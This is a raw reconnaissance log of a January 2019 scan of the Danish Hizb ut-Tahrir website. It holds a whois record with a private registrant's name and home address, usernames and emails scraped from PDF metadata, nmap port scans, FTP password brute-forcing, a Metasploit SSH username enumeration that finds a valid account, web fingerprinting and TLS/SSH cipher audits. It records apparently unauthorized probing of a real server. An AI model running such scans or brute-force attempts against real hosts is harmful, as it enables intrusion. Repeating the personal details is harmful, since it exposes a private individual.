- # Copyright (c) 2002 - 2019 by DK Hostmaster A/S
- #
- # Version: 2.0.2
- #
- # The data in the DK Whois database is provided by DK Hostmaster A/S
- # for information purposes only, and to assist persons in obtaining
- # information about or related to a domain name registration record.
- # We do not guarantee its accuracy. We will reserve the right to remove
- # access for entities abusing the data, without notice.
- #
- # Any use of this material to target advertising or similar activities
- # are explicitly forbidden and will be prosecuted. DK Hostmaster A/S
- # requests to be notified of any such activities or suspicions thereof.
- Domain: hizb-ut-tahrir.dk
- DNS: hizb-ut-tahrir.dk
- Registered: 1999-08-05
- Expires: 2019-09-30
- Registration period: 1 year
- VID: no
- Dnssec: Unsigned delegation
- Status: Active
- Registrant
- Handle: MJ7736-DK
- Name: Mulie Langberg Jaw
- Address: Tømrergade 6,1 tv
- Postalcode: 2200
- City: København N
- Country: DK
- Administrator
- Handle: MJ7736-DK
- Name: Mulie Langberg Jaw
- Address: Tømrergade 6,1 tv
- Postalcode: 2200
- City: København N
- Country: DK
- Nameservers
- Hostname: ns1.unoeuro.com
- Handle: UA1074-DK
- Hostname: ns2.unoeuro.com
- Handle: UA1074-DK
- Hostname: ns3.unoeuro.com
- Handle: UA1074-DK
- Hostname: ns4.unoeuro.com
- Handle: UA1074-DK
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [1/25] /webhp?hl=en-CA
- [x] Error downloading /webhp?hl=en-CA
- [2/25] https://www.hizb-ut-tahrir.dk/data/loebesedler/20100802_LS_Tajikistan.pdf
- [3/25] http://www.hizb-ut-tahrir.dk/data/books/aendring.pdf
- [4/25] http://www.hizb-ut-tahrir.dk/data/books/takattul.pdf
- [x] Error in PDF metadata Creator
- [5/25] https://www.hizb-ut-tahrir.dk/data/presse/20110317_PM_Integrationsministeren.pdf
- [6/25] http://www.hizb-ut-tahrir.dk/data/books/ForfatningsudkastKhilafah.pdf
- [7/25] https://www.hizb-ut-tahrir.dk/data/loebesedler/20110225_Libyen.pdf
- [8/25] https://www.hizb-ut-tahrir.dk/data/presse/OslosTragedie.pdf
- [9/25] http://www.hizb-ut-tahrir.dk/data/books/PolitiskDeltagelse.pdf
- [x] Error in PDF metadata Creator
- [10/25] http://www.hizb-ut-tahrir.dk/data/books/terrorismemag.pdf
- [11/25] http://www.hizb-ut-tahrir.dk/data/books/Mafahim.pdf
- [x] Error in PDF metadata Creator
- [12/25] http://www.hizb-ut-tahrir.dk/data/books/Miljoeproblemet.pdf
- [13/25] http://hizb-ut-tahrir.dk/data/books/Torklaedehaefte.pdf
- [14/25] http://www.hizb-ut-tahrir.dk/data/books/Kalifatetsstatsinstitutioner.pdf
- [15/25] http://www.hizb-ut-tahrir.dk/data/books/muslimernesrolleivesten.pdf
- [16/25] http://www.hizb-ut-tahrir.dk/data/books/islamiskpsyke.pdf
- [17/25] https://hizb-ut-tahrir.dk/data/qa/20120116_qa_iran.pdf
- [18/25] http://www.hizb-ut-tahrir.dk/data/presse/20120425_PM_Palaestina.pdf
- [19/25] https://www.hizb-ut-tahrir.dk/data/loebesedler/Denrussiskesikkerhedstjenestesanarkistiskepraksis.pdf
- [20/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/USA_manipulerer_med_Selvstyret_i_direkte_og_indirekte_forhandlinger.pdf
- [21/25] https://www.hizb-ut-tahrir.dk/data/presse/20110429_PM_DelegationTilSyriensAmbassade.pdf
- [22/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/20110520_LS_Obama.pdf
- [23/25] http://www.hizb-ut-tahrir.dk/data/books/system.pdf
- [x] Error in PDF metadata Creator
- [24/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/29012010_tagdavedlaereiderkanse.pdf
- [25/25] http://www.hizb-ut-tahrir.dk/data/loebesedler/20100901_LS_IrakTilbagetraekning.pdf
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] List of users found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- OEM
- Maryam
- Jana
- k
- OKOADM
- khilafah.dk
- pc
- Hizb ut-Tahrir Skandinavien
- Callshop Admin
- A
- Navid
- PC
- [+] List of software found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Microsoft Office Word
- ��Microsoft� Office Word 2007
- Acrobat Distiller 5.0.5 (Windows)
- ��Microsoft� Word 2010
- Nitro PDF PrimoPDF
- PrimoPDF http://www.primopdf.com
- Adobe PDF Library 15.0
- Adobe InDesign CC 2015 (Windows)
- Acrobat Distiller 9.0.0 (Windows)
- PScript5.dll Version 5.2.2
- AFPL Ghostscript 8.54
- Acrobat Distiller 9.4.2 (Windows)
- [+] List of paths and servers found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Normal.dot
- [+] List of e-mails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Chadi@hizb-ut-tahrir.dk
- info@hizb-ut-tahrir.dk
- info@hizb-ut-tahrir.dk
- Chadi@hizb-ut-tahrir.dk
- cf@hizb.dk
- info@hizb-ut-tahrir.dk
- Chadi@hizb-ut-tahrir.dk
- info@hizb-ut-tahrir.dk
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:05 EST
- Warning: 93.191.156.145 giving up on port because retransmission cap hit (2).
- Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
- Host is up (0.50s latency).
- rDNS record for 93.191.156.145: linux260.unoeuro.com
- Not shown: 468 filtered ports, 3 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 443/tcp open https
- 8008/tcp open http
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:08 EST
- Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
- Host is up (0.24s latency).
- rDNS record for 93.191.156.145: linux260.unoeuro.com
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:08 EST
- Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
- Host is up (0.47s latency).
- rDNS record for 93.191.156.145: linux260.unoeuro.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 1623 guesses in 181 seconds, average tps: 8.8
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc
- Running (JUST GUESSING): Linux 2.6.X|3.X (90%), WatchGuard Fireware 11.X (90%), Synology DiskStation Manager 5.X (90%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1
- Aggressive OS guesses: Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%), Linux 3.10 (90%), Linux 3.4 (90%), WatchGuard Fireware 11.8 (90%), Linux 3.1 - 3.2 (90%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 233.00 ms 10.253.200.1
- 2 233.04 ms v106.ce02.hkg-10.hk.leaseweb.net (43.249.36.189)
- 3 233.04 ms xe-2-0-3.br01.hkg-10.hk.leaseweb.net (43.249.36.8)
- 4 233.61 ms xe-4-1-0.br01.hkg-12.hk.leaseweb.net (64.120.119.228)
- 5 234.82 ms 63-217-237-129.static.pccwglobal.net (63.217.237.129)
- 6 449.70 ms 63.223.54.30
- 7 444.87 ms ae20-0.ashbnqp2.us.ip.tdc.net (206.126.236.59)
- 8 512.55 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 9 509.37 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 10 507.69 ms 212.237.248.5
- 11 ...
- 12 507.23 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:13 EST
- Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
- Host is up (0.18s latency).
- rDNS record for 93.191.156.145: linux260.unoeuro.com
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 11 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 232.38 ms 10.253.200.1
- 2 232.63 ms v106.ce01.hkg-10.hk.leaseweb.net (43.249.36.188)
- 3 233.41 ms te-0-0-0-0.br02.hkg-10.hk.leaseweb.net (43.249.36.10)
- 4 234.20 ms xe-5-1-0.br01.hkg-12.hk.leaseweb.net (64.120.119.226)
- 5 234.65 ms 63-217-237-129.static.pccwglobal.net (63.217.237.129)
- 6 447.75 ms 63.223.54.30
- 7 442.95 ms ae20-0.ashbnqp2.us.ip.tdc.net (206.126.236.59)
- 8 509.37 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 9 510.00 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 10 497.81 ms 212.237.248.7
- 11 504.89 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => hizb-ut-tahrir.dk
- RHOST => hizb-ut-tahrir.dk
- [*] 93.191.156.145:22 - SSH - Using malformed packet technique
- [*] 93.191.156.145:22 - SSH - Starting scan
- [-] 93.191.156.145:22 - SSH - User 'admin' not found
- [-] 93.191.156.145:22 - SSH - User 'administrator' not found
- [-] 93.191.156.145:22 - SSH - User 'anonymous' not found
- [-] 93.191.156.145:22 - SSH - User 'backup' not found
- [-] 93.191.156.145:22 - SSH - User 'bee' not found
- [-] 93.191.156.145:22 - SSH - User 'ftp' not found
- [-] 93.191.156.145:22 - SSH - User 'guest' not found
- [-] 93.191.156.145:22 - SSH - User 'GUEST' not found
- [-] 93.191.156.145:22 - SSH - User 'info' not found
- [-] 93.191.156.145:22 - SSH - User 'mail' not found
- [-] 93.191.156.145:22 - SSH - User 'mailadmin' not found
- [-] 93.191.156.145:22 - SSH - User 'msfadmin' not found
- [-] 93.191.156.145:22 - SSH - User 'mysql' not found
- [-] 93.191.156.145:22 - SSH - User 'nobody' not found
- [-] 93.191.156.145:22 - SSH - User 'oracle' not found
- [-] 93.191.156.145:22 - SSH - User 'owaspbwa' not found
- [-] 93.191.156.145:22 - SSH - User 'postfix' not found
- [-] 93.191.156.145:22 - SSH - User 'postgres' not found
- [-] 93.191.156.145:22 - SSH - User 'private' not found
- [-] 93.191.156.145:22 - SSH - User 'proftpd' not found
- [-] 93.191.156.145:22 - SSH - User 'public' not found
- [-] 93.191.156.145:22 - SSH - User 'root' not found
- [-] 93.191.156.145:22 - SSH - User 'superadmin' not found
- [+] 93.191.156.145:22 - SSH - User 'support' found
- [-] 93.191.156.145:22 - SSH - User 'sys' not found
- [-] 93.191.156.145:22 - SSH - User 'system' not found
- [-] 93.191.156.145:22 - SSH - User 'systemadmin' not found
- [-] 93.191.156.145:22 - SSH - User 'systemadministrator' not found
- [-] 93.191.156.145:22 - SSH - User 'test' not found
- [-] 93.191.156.145:22 - SSH - User 'tomcat' not found
- [-] 93.191.156.145:22 - SSH - User 'user' not found
- [-] 93.191.156.145:22 - SSH - User 'webmaster' not found
- [-] 93.191.156.145:22 - SSH - User 'www-data' not found
- [-] 93.191.156.145:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://hizb-ut-tahrir.dk...
- _____________________ SITE INFO ______________________
- IP Title
- 93.191.156.145 403 Forbidden
- ______________________ VERSION _______________________
- Name Versions Type
- Apache Platform
- ____________________ INTERESTING _____________________
- URL Note Type
- /readme.html Readme file Interesting
- /install.php Installation file Interesting
- /test.php Test file Interesting
- ______________________________________________________
- Time: 91.6 sec Urls: 598 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 403 Forbidden
- Date: Wed, 30 Jan 2019 01:18:31 GMT
- Server: Apache
- Content-Type: text/html; charset=iso-8859-1
- HTTP/1.1 403 Forbidden
- Date: Wed, 30 Jan 2019 01:18:32 GMT
- Server: Apache
- Content-Type: text/html; charset=iso-8859-1
- ######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning https://hizb-ut-tahrir.dk...
- ______________________ SITE INFO ______________________
- IP Title
- 93.191.156.145 403 Forbidden
- _______________________ VERSION _______________________
- Name Versions Type
- Apache Platform
- _____________________ INTERESTING _____________________
- URL Note Type
- /readme.html Readme file Interesting
- /install.php Installation file Interesting
- /test.php Test file Interesting
- _______________________________________________________
- Time: 126.0 sec Urls: 599 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/2 403
- date: Wed, 30 Jan 2019 01:21:39 GMT
- server: Apache
- content-type: text/html; charset=iso-8859-1
- HTTP/2 403
- date: Wed, 30 Jan 2019 01:21:41 GMT
- server: Apache
- content-type: text/html; charset=iso-8859-1
- #######################################################################################################################################
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 93.191.156.145
- Testing SSL server hizb-ut-tahrir.dk on port 443 using SNI name hizb-ut-tahrir.dk
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: hizb-ut-tahrir.dk
- Altnames: DNS:hizb-ut-tahrir.dk, DNS:www.hizb-ut-tahrir.dk
- Issuer: Let's Encrypt Authority X3
- Not valid before: Dec 24 03:46:41 2018 GMT
- Not valid after: Mar 24 03:46:41 2019 GMT
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:45 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- Not shown: 447 filtered ports, 24 closed ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 443/tcp open https
- 8008/tcp open http
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:45 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.027s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:45 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 4979 guesses in 180 seconds, average tps: 27.0
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 19 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 22.86 ms 10.246.200.1
- 2 23.20 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 24.38 ms 37.120.128.166
- 4 23.20 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 23.18 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 121.71 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 120.23 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 116.02 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 122.00 ms if-ae-4-2.tcore2.l78-london.as6453.net (80.231.131.157)
- 10 121.49 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 115.37 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 122.72 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 116.46 ms 195.219.87.13
- 14 114.22 ms 195.219.87.25
- 15 128.74 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 133.41 ms 195.41.183.146
- 17 135.56 ms 212.237.248.5
- 18 ...
- 19 138.30 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
